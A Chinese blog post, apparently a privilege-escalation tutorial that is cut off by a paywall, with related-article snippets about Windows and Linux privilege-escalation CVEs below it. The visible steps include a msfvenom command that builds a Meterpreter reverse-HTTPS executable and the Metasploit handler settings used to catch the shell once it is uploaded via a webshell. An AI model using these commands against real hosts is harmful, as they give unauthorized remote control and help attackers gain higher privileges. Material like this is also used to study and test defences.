提权——Windows 本地漏洞提权

最新推荐文章于 2025-04-03 14:32:13 发布
最新推荐文章于 2025-04-03 14:32:13 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 提权 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/z1756227332/article/details/104817169
版权
在进行信息安全操作时,当权限不足时需要进行提权。本文介绍了三种提权方式:数据库提权、本地溢出漏洞提权和第三方软件提权,并详细讲解了如何利用MSF(Metasploit Framework)进行Windows本地漏洞提权的步骤,包括生成反弹shell、上传并执行程序、配置MSF监听模块、搜索和利用提权漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

当我们获得webshell 想要进行创建用户等操作的时候会发现自己的权限不够,这个时候我们就需要进行提权的操作
提权主要包含这几种方式
1.数据库提权
2.本地溢出漏洞提权
3.第三方软件提权

我们来演示一下 利用MSF来进行本地漏洞的提权操作。
1.通过msf生成反弹shll进行执行反弹shll的操作
进入到kalis使用这条命令 来生成一个反弹shell 的.exe程序。
msfvenom -p windows/meterpreter/reverse_https LHOST=反弹的ip地址 LPORT=反弹的端口号 -f exe > /root/shell01.exe

在这里插入图片描述

2.上传shell01.exe这个程序
在这里插入图片描述

3.运行shell01.exe 开启MSF,配置监听模块
使用MSF监听模块进行监听
usr exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 设置生成反弹shell的IP地址
set lport 设置生成反弹shell的端口号
exploit执行
在这里插入图片描述
4.当获取meterpreter>shell之后 使用backgrou

最低0.47元/天 解锁文章
——Win漏洞及数据库&AT&SC&PS
m0_61506558的博客
10-12 807
最近在上计算机组成原理的时候接触到了数据溢出,之前也接触过一点,对于PWN选手研究的会比较深,通过本篇文章,整理的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要升自己的限,就得在后台页面中寻找漏洞利用的点,成功上传webshell限.(一)限介绍​ 可分为纵向与横向:纵向:低限角色获得高限角色的限;横向:获取同级别角色的限。
[升] Windows — 系统内核溢出漏洞
Blue17 の 小窝
01-29 1142
注意:很容易让电脑蓝屏,所以如果是测试的话,前最好做好系统备份。溢出漏洞就像是往杯子里装水 —— 如果水太多,被子装不下了,就会溢出来。计算机中有个地方叫作缓存区。程序缓存区的大小是事先设置好的,如果用户输入数据的大小超过了缓存区的大小,程序就会溢出。系统内核溢出漏洞是一种通用的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁—— 即使微软已经针对某个漏洞发布了补丁,但如果系统没有立即安装补丁,就会让攻击者有机可乘。
Linux sudo 漏洞 CVE-2021-3156 复现 附exp
god_Zeo的安全博客
02-04 1913
0x01 CVE-2021-3156: 缓冲区溢出漏洞 在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root限。 0x02 影响版本 Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本 Sudo =>1.9.5p2 0x03 漏洞检测 测试环境:ubuntu:20.04 检测是否存在 s
Windows本地漏洞学习(CVE-2019-0841)
weixin_30402085的博客
04-16 1025
1、这是一个啥漏洞? 睁眼一看,妈呀本地,快加入本地漏洞利用包里,速度加入。github连接我就不发了。担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码。 2、文件读写限转命令执行限! 为啥能,基本原理先说一下,这个漏洞可以让你拥有“文件读写限转命令执行限”的典型案例,利用一个低限获取高限文件的读写限,即可利用恶意代码注入,劫持dll等方式赋予自...
黑客在Windows系统下的8种主要姿势,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-03 1095
Windows的世界里,
CVE-2021-1732_Windows本地漏洞
weixin_45715461的博客
06-30 2710
CVE-2021-1732_Windows本地漏洞
本地漏洞分析
anquan2233的博客
12-31 764
根据官方信息,该漏洞Windows Backup Service 中的漏洞,经过身份认证的攻击者可利用此漏洞升至 SYSTEM 限。成功利用此漏洞需要攻击者赢得竞争条件。EXP 代码位于 Github,供了两个版本,版本 1 可以实现任意文件删除,可稳定复现;版本 2 尝试利用任意删除实现本地,但是复现不稳定。在临时文件夹下,使用 FULL_SHARING 模式创建目录 dir ,作为上述临时文件的保存位置;
polkit pkexec 本地漏洞
sre救赎之路
05-04 1051
2022年1月25日。
CVE-2023-28252 CLFS Windows 本地漏洞 POCC 源码
08-23
卡巴斯基披露该在野0day漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system限———Windows中最高的用户限级别。该漏洞允许改变基础日志文件,迫使系统将基础日志文件中的假...
漏洞复现 CVE-2021-1732——Windows本地漏洞(附poc)
gjgj的博客
04-29 7608
1、漏洞简述 CVE-2021-1732: 漏洞发生在Windows图形驱动win32kfull!NtUserCreateWindowEx函数中,该函数存在一处内核回调用户态分配内存与tagWND->flag属性设置不同。 成功利用该漏洞Windows本地攻击者可以升到system限。 2021年03月10日,CVE-2021-1732漏洞细节与POC已经公开。 2、风险等级 漏洞等级:高危,漏洞评分:7.8 评定方式 等级 .
Windows本地漏洞(CVE-2021-1732)复现
玄道的网安博客
04-13 2247
漏洞概述 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统限。 影响版本 Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Versi..
cmd反弹shell
10-24
cmd反弹shell
CVE-2018-8120 Microsoft Windows漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows漏洞 Exp_32 该资源适用于64位windows操作系统
CVE-2023-28252 CLFS Windows 本地漏洞 POC
【Rainbow Network Technology co., LTD】
08-23 1353
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞
CVE-2021-3493:Overlay 文件系统 Ubuntu 本地漏洞分析
个人笔记
07-02 2000
由于笔者已分析过 CVE-2023-0386,在此基础上,分析 CVE-2021-3493 可能更为简单。CVE-2023-0386 需要理解OverlayFS、Linux 命名空间、SetUID 位的概念;除此之外,如果你想理解 CVE-2021-3493,还需要了解Capability、Linux 文件扩展属性。当你理解了这些常见的概念之后,在手动复现这些漏洞,会有更加深刻的理解,并且可以高对 Linux 本地漏洞的认知。
升】 Windows10 本地漏洞复现及详细分析(CVE-2021-1732)
李火火的安全圈
12-07 5325
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的升至最高的 。属于windows系统级别的二进制漏洞
linux本地漏洞,漏洞预警 | Ubuntu存在本地漏洞(附EXP及应对措施)
weixin_42566108的博客
05-16 478
今天下午,Twitter 用户 @Vitaly Nikolenko 发布消息,称 ubuntu 最新版本(Ubuntu 16.04)存在高危的本地漏洞,而且推文中还附上了 EXP 下载地址。Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux。此次发布的 EXP 即为 CVE-2017-16995 Linux 内核漏洞的攻击代码。该漏洞存在于L...
Linux--SUID&内核漏洞本地用户
金灰的博客
04-29 970
免责声明:本文仅做技术交流与学习,请不要乱搞破坏...
本地漏洞的分析与网络安全
YtyVerilog的博客
09-22 223
本地漏洞是指攻击者通过利用操作系统或应用程序中的漏洞,成功将其限从低升至高限。这种漏洞通常存在于操作系统内核或应用程序的特代码中。攻击者利用本地漏洞可以绕过访问控制机制,获取系统管理员或其他高限用户的限,从而执行潜在的恶意操作。本地漏洞是指攻击者通过利用操作系统或应用程序中的漏洞,成功将其限从低升至高限。这种漏洞通常存在于操作系统内核或应用程序的特代码中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值